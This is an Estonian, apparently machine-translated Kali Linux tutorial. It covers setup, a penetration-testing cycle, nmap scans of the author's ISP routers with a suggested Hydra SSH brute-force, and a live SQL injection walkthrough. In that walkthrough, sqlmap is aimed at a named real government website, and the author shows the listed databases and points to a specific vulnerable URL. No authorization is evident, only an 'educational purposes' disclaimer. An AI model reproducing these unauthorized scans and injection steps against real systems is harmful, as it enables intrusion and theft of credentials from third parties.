Kali Linuxi õpetus

Kali Linux Tutorial



Kui olete ekspert või vähemalt tunnete Linuxit, käske ja keskkonda, installisite just oma arvutisse Kali Linuxi, soovisite saada Kali Linuxi meistriks või eetiliseks häkkeriks, siis olete õiges kohas. Selles artiklis käsitlen Kali Linuxi õpetust Linuxi kasutajatele, kes pole Kali juba tuttavad, ja alustan mõningate põhiliste tehnikatega, mida Kali kasutamisel häkkimisel ja turvatestimisel kasutatakse.

Mis on Kali Linux?

Kali Linux, ( ilmus esmakordselt 13. märtsil 2013 ), mis oli ametlikult tuntud kui BackTrack, mille on välja töötanud turvafirma Offensive Security, on kohtuekspertiisi ja turvalisusele keskendunud jaotus, mis põhineb Debiani testimisharul. Kali Linux on loodud läbitungimiskatset, andmete taastamist ja ohtude avastamist silmas pidades. Projekt läks selle aasta alguses üle jooksva vabastamise mudelile, et pakkuda levitaja kasutajatele ajakohasemaid turvateenuseid. Kali Linux on tasuta ja jääb alati. See sisaldab 600+ tungimistesti tööriista.







Miks just Kali Linux? Kas see sobib teile?

Kali Linux on viimasel ajal palju populaarsust kogunud. Ja selle taga on põhjus. Häkkimine on populaarse kultuuri laheda asjana tagasi ja selle võib omistada märkimisväärselt telesarjale Mr. Robot. Hr Roboti populaarsus aitas Kali Linuxil uusi kasutajaid hankida. Inimesed, kellel pole peaaegu üldse Linuxi tundmist ega midagi arvutiturbega seonduvat, üritavad nüüd kasutada Kali oma peamise Linuxi distributsioonina.



Meie kõigi aegade kõige arenenum läbitungimiskatse. - Kali Linuxi arendajad. (See on kirjutatud Kali.org avalehel lehe ülaosas.) Mida saate sellest avaldusest? Kas märkate seda: APTD (Advanced Penetration Testing Distribution)? Siin pole sõna otseses mõttes terminit häkkimine. Kali Linux on sama mis teised Linuxi distributsioonid. Lihtsalt öeldes on see Linuxi distributsioon, mis on pakitud turvalisusega seotud tööriistadega ja on suunatud võrgu- ja arvutiturbeekspertidele. Kali Linuxi kasutamine keskendub aga ainult turvalisusele ja kohtuekspertiisile.



Linuxi distributsioon pole midagi muud kui kimp, mis sisaldab Linuxi tuuma, põhiliste utiliitide ja rakenduste komplekti ning mõningaid vaikeseadeid. Niisiis, Kali Linux ei paku selles mõttes midagi ainulaadset, enamiku pakutavatest tööriistadest saab installida mis tahes Linuxi distributsiooni.





Kali Linux on spetsiaalselt loodud vastama professionaalse läbitungimise testimise ja turvaauditi nõuetele. See on suunatud konkreetsele Linuxi kasutajate alamhulgale. Pentesters, häkkerid jne. See ei ole soovitatav levitamine, kui ootate Kalit üldotstarbeliseks Linuxi töölauaks arendamiseks, veebidisainiks, mängudeks, kontoriks jne. Kali võib teile mõningaid väljakutseid pakkuda, isegi kui olete kogenud Linuxi kasutaja .

ASJAD, MIDA TEHA PÄRAST KALI LINUXI PAIGALDAMIST

Pärast Kali Linuxi installimist võite mõelda, mida sellega edasi teha, eks? Selle probleemiga seisavad silmitsi kõik, ärge muretsege.



1. samm: seadistage hoidla

Esiteks võite seda juba teada, kuid hoidla õigesti seadistamine on kriitilise tähtsusega. Nagu ma ütlesin, on Kali Linuxi jooksva väljalaske mudel püüdnud pakkuda levitaja kasutajatele ajakohasemaid turvateenuseid. Üldiselt, kui teil on Kali Linux värskelt installitud, viitab hoidla installimiseks kasutatavale meediumile. Selle parandamiseks peate hoidla muutma ametlikuks Kali Linuxi hoidlaks. Vajalik fail asub all /etc/apt/sources.list . Avage fail lehtede tekstiredaktoriga ja asendage vaikehoidla selle ametliku Kali jooksva hoidlaga:

deb http://http.kali.org/kali kali-rolling main contrib non-free # For source package access, uncomment the following line # deb-src http://http.kali.org/kali kali-rolling main contrib non-free 

2. SAMM: UUENDA JA UUENDA OMA KALI LINUX

Pärast selle süsteemi värskendamist ja täiendamist sünkroonige oma Kali Linux uusima versiooniga. Selleks avage terminal ja tippige:

apt update -y && apt upgrade -y && apt dist-upgrade 

Käsk apt update laadib alla ja toob alla pakettide loendi teabe hoidlatest ja värskendab neid, et saada teavet pakettide uusimate versioonide ja nende sõltuvuste kohta.

Apt upgrade käsk laadib alla ja installib installitud Kali Linuxi pakettide pakettide uuema versiooni, kui sellel pole sõltuvustest vigu.

Apt dist-upgrade värskendab kõik paketid uusimale saadaolevale versioonile, olenemata sellest. Samuti installige ja eemaldage sõltuvused vastavalt vajadusele (installige sõltuvused muidugi pakettide rahuldamiseks, kuid eemaldage ka sõltuvused, mis jäid orvuks, kui värskendatud pakett seda sõltuvust enam ei vaja.

KALI LINUXIGA PÕHISE TULEMISE TESTIMISE KONTSEPTSIOON

Pärast nende toimingute edukat sooritamist on sihitud süsteemil Kali Linuxiga teha kolm peamist asja, sealhulgas:

  1. Traadita võrgu häkkimine - Wifi häkkimine, andmepüük, ARP -mürgitus jne
  2. Veebirakenduste häkkimine -SQL-i süstimine, saidiüleste taotluste võltsimine (CSRF), veebipõhine andmepüük jne.
  3. Seadme häkkimine - Kasutage sihtmasinat selle kontrolli alla saamiseks.

Ma ei hõlma asjade Interneti häkkimist, see ei tähenda, et Kali Linuxil pole selleks otstarvet. Kuid sõna otseses mõttes võib see kuuluda ka seadme häkkimisse. Kuna seadmel on välimus ja vorm. Selles õpetuses käsitlesin nende põhiteadmisi. Kuna Kali Linux on tohutu, ei mahu see ühte artiklisse!

Samuti peate teadma läbitungimise testimise tsüklit või protseduuri. Nemad on:

  1. Luure - teabe kogumine
  2. Skaneerimine
  3. Operatsioon
  4. Pärast ekspluateerimist

Juhtmevaba võrgu häkkimine KALI LINUXiga

Traadita võrgu häkkimise osas võib ohver olla erinev. Kuna traadita võrgud koosnevad mitmest asjast, näiteks ISP (Interneti -teenuse pakkuja), ruuter ja selle kaaslased (modem, jaotur, lüliti jne) ja kliendid (kasutajad, CCTV, kaugarvuti jne). Neil on ka haavatavad võimalused.

Internet on suur ja keeruline võrguseadmete kogum, mis on omavahel ühendatud lüüsidega. Pakettide marsruudi jälgimine on oluline, et teada saada, kuidas jõuate kindla hosti nime või siht -IP -aadressini.

Kali Linuxil on sisseehitatud tööriist nimega Traceroute. Traceroute kasutab väljal töötamiseks IP -protokolli aega ja püüab esile kutsuda ICMP TIME_EXCEEDED vastuse igast lüüsist, mis viib mõne hostini. Traceroute üritab jälgida IP -paketi marsruuti mõnele Interneti -hostile, käivitades sondipaketid väikese TTL -iga (aeg elada), seejärel kuulata ICMP -l ületatud lüüsi vastust. Ma toon teile ja näite, kuidas jälgida Interneti -teenuse pakkuja ruuterit, mida kasutatakse meie ühenduse haldamiseks Traceroute abil.

1. Tunnustus

Teabe kogumine on kõige olulisem algus, ärge jätke seda sammu vahele. Selles etapis on meie eesmärk saada võimalikult palju kasulikku teavet ja seejärel kasutatakse seda teavet edasisteks sammudeks.

Esmalt avage terminal ja tippige see käsk, et alustada saidile tee jälgimist, sel juhul määran saidi aadressiks google.com.

traceroute google.com 

Traceroute'i ekraanipilt

2. Skaneerimine

Kui käsud käivitame, loetleb see, kuhu meie pakett järjestikku läheb. Nagu ülal näete, sain 3 hüpet, millest üks on minu Interneti -teenuse pakkuja. Loendi esimene IP on minu ruuter, mis toimib lüüsina. Ja kaks järgmist neist kuuluvad minu Interneti -teenuse pakkujale. Nüüd kontrollime teenust, mida nad Nmapi abil kasutavad. Niisiis, eesmärgid, mida me skannime, on 10.152.192.1 ja 10.13.223.102 . Terminalis käivitasin järgmise käsu:

nmap -v -sS [IP Target] -Pn 

Jaotame käsu argumendi:

-v = Luba paljusõnaline režiim

-sS = Kasutage TCP SYN skannimistehnikat

-Pn = kohelda kõiki hosteid võrgus -jätke hosti avastamine vahele

Ja siin on tulemus, mille saime.

nmap ekraanipilt 2

Kahjuks on kõik sadamad sisse lülitatud 10.152.192.1 on filtreeritud, see tähendab, et IDS või tulemüür blokeerivad sellel IP -l kõik sissetulevad TCP -ühendused. Nüüd skaneerime teise sihtmärgi.

nmap ekraanipilt 1

3. Operatsioon

Selle protseduuri puhul ei ole ma mõeldud tegelikuks ekspluateerimiseks, vaid näitan teile, kuidas. Ülaltoodud Nmap skaneerimise tulemuste põhjal teame, et sellel IP -l töötab pordi 22 SSH -server ja see on avatud. See on avatud julmusele, haha! Leidsime augu, see SSH -server on võimalik auk, kuhu võiksime pääseda. Kali Linuxis on mitmeid tööriistu, mis toetavad bruteforce'i või sõnastikurünnakuid SSH -protokolli vastu. Kõige populaarsem ja võimsam on Hydra.

Ok, see oli põhiprotseduur, mis viis läbi läbitungimistesti sihitud serveri vastu, mis on meie näites siin minu Interneti -teenuse pakkuja.

VEEBI RAKENDUSED KALI LINUXI HAKKEMISEKS

Tegelikult, kui te sellesse kirglikult suhtute, saate oma häkkimiskeskkonna seadistada, installides oma Kali Linuxi DWVA (Damn Vulnerable Web App). See on PHP/MySQL veebirakendus, millel on hunnik haavatavaid auke. Selle peamised eesmärgid on olla abiks turvatöötajatele, et testida oma oskusi ja tööriistu õiguskeskkonnas, ning aidata veebiarendajatel paremini mõista veebirakenduste turvamise protsesse. DWVA saate tasuta Githubist siit: https://github.com/ethicalhack3r/DVWA.

Praegu näitan teile, kuidas veebirakenduste häkkimist päris saidil teha. Kuid lubage mulle, et see piirdub ainult hariduslikel eesmärkidel. Simuleerime SQL -i süstimise abil tõelist rünnakut päris saidile.

Eeltingimus

Kaetud tööriistad:

-Whatweb (eelinstallitud)

-Nmap (eelinstallitud)

- SQLiv (installige käsitsi)

-SQLMap (eelinstallitud)

Vajame veel ühte lisatööriista, mis on saadaval Githubis siin: https://github.com/Hadesy2k/sqliv, installige see kõigepealt meie Kali Linuxi. See tööriist nimega SQLiv, mis suudab sihtotstarbelist skannimist teha, pakkudes konkreetset domeeni (koos indekseerimisega). Sisestage terminal:

git clone https://github.com/Hadesy2k/sqliv.git cd sqliv && sudo python2 setup.py -i 

Sihtmärk: www.trenggalekkab.go.id

1. Tunnustus

Koguge võimalikult palju kasulikku teavet. Võime avada veebilehe ja tuvastada, milline rakendus sellel saidil töötab. Esiteks kontrollime, milline veebisait see on. Me kasutame selleks wewebit.

whatweb www.trenggalekkab.go.id 

Milline veebipilt

Nagu ülaltoodud tulemust näete, asub sihtmärk Indoneesias. See töötab Apache v2.2.27 veebiserveris ja sellel on ka PHP v5.4.31 , sellel on IP -aadress 103.247.21.142 . Olgu, pange see tähele. Võimalik, et peate külastama selle veebisaiti, otsides koostatud faili või lehte, URL -i parameetreid või isegi sisselogimisvormi. Praegu vajame seda IP -aadressi järgmiseks skaneerimise etapiks.

2. Skaneerimine

Nagu varemgi, kasutame uuesti Nmapi, et skannida, millised sadamad ja teenused sihtmärgil töötavad.

nmap -v -sS 103.247.21.142 

Ja siin on tulemus, mille saime:

Completed SYN Stealth Scan at 21:22, 261.93s elapsed (1000 total ports) Nmap scan report for ip-103-247-21-142.wifian.net.id (103.247.21.142) Host is up (0.069s latency). Not shown: 985 closed ports PORT STATE SERVICE 21/tcp open ftp 25/tcp open smtp 53/tcp open domain 80/tcp open http 110/tcp open pop3 111/tcp open rpcbind 143/tcp open imap 212/tcp open anet 443/tcp open https 465/tcp open smtps 587/tcp open submission 993/tcp open imaps 995/tcp open pop3s 3128/tcp filtered squid-http  3306/tcp open mysql  

Sihtkoha iga teenust käsitlevad mitmed avatud pordid, kuid pilkupüüdev on see, et mysql-teenus pordis 3306. On näidatud, et see sait kasutab mysql hallata oma teavet andmebaasides. Siis mõtlen, kas sellel saidil on SQL -i süstimise turvaauke. Niisiis, skannin saidi uuesti, kasutades just installitud SQLivi. Sisestasin käsu:

sqliv -t www.trenggalekkab.go.id 

SQL -häkkimise ekraanipilt 1

Leidsime sellel saidil 2 võimalikku SQL -i haavatavat URL -i. Pange need URL -id tähele.

3. Operatsioon

OK, meil on SQL -i haavatavad URL -id ja oleme täitmiseks valmis. Selleks kasutame SQLMapi. Süntaks on järgmine:

sqlmap [Vulnerable URL] --dbs 

Käsk peaks välja nägema selline:

 sqlmap -u "http://www.trenggalekkab.go.id/berita.php?page=208" --dbs 

Argument –dbs on käsk SQLMapil sihtandmebaasid hankida. Siin on väljund, mille saime:

[INFO] the back-end DBMS is MySQL web application technology: PHP 5.4.31, Apache 2.2.27 back-end DBMS: MySQL 5 [21:46:04] [INFO] fetching database names [21:46:04] [INFO] the SQL query used returns 2 entries [21:46:04] [INFO] resumed: information_schema [21:46:04] [INFO] resumed: trengkab_trg available databases [2]: [*] information_schema [*] trengkab_trg 

SQLMap leidis 2 andmebaasi, kuid ainult ühe neist, mis sisaldab tundlikke andmeid, näiteks administraatori mandaadi konto. See on trengkab_trg. Pärast andmebaaside leidmist on meil veel üks samm. See tähendab tabelite ja veergude leidmist ning viimane samm on andmete tühjendamine. Ma ei näita teile, kuidas siin selles jaotises seda sihtmärki kasutada. Vähemalt teate rünnakutsükli põhiideed ja mõningaid tööriistu.

SEADMETE HAKKIMINE

Selle saidi tulevases artiklis käsitleme seadme häkkimist, olge lainel. Eelhoiatusena tahate veenduda, et teate selleks mõnda Pythoni.